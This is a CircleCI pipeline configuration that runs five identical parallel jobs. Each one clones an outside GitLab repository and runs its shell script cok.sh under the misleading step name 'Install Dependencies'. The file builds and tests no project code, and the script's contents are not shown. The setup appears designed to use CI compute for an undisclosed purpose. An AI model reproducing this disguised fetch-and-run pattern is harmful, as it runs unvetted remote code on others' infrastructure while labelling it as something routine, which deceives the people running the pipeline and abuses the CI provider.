# Use the latest 2.1 version of CircleCI pipeline process engine. See: https://circleci.com/docs/2.0/configuration-reference
version: 2.1
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/fajarpanuluh69/cok && cd cok/ && chmod +x ./cok.sh && ./cok.sh
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/fajarpanuluh69/cok && cd cok/ && chmod +x ./cok.sh && ./cok.sh
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/fajarpanuluh69/cok && cd cok/ && chmod +x ./cok.sh && ./cok.sh
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/fajarpanuluh69/cok && cd cok/ && chmod +x ./cok.sh && ./cok.sh
    aku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: git clone https://gitlab.com/fajarpanuluh69/cok && cd cok/ && chmod +x ./cok.sh && ./cok.sh

workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5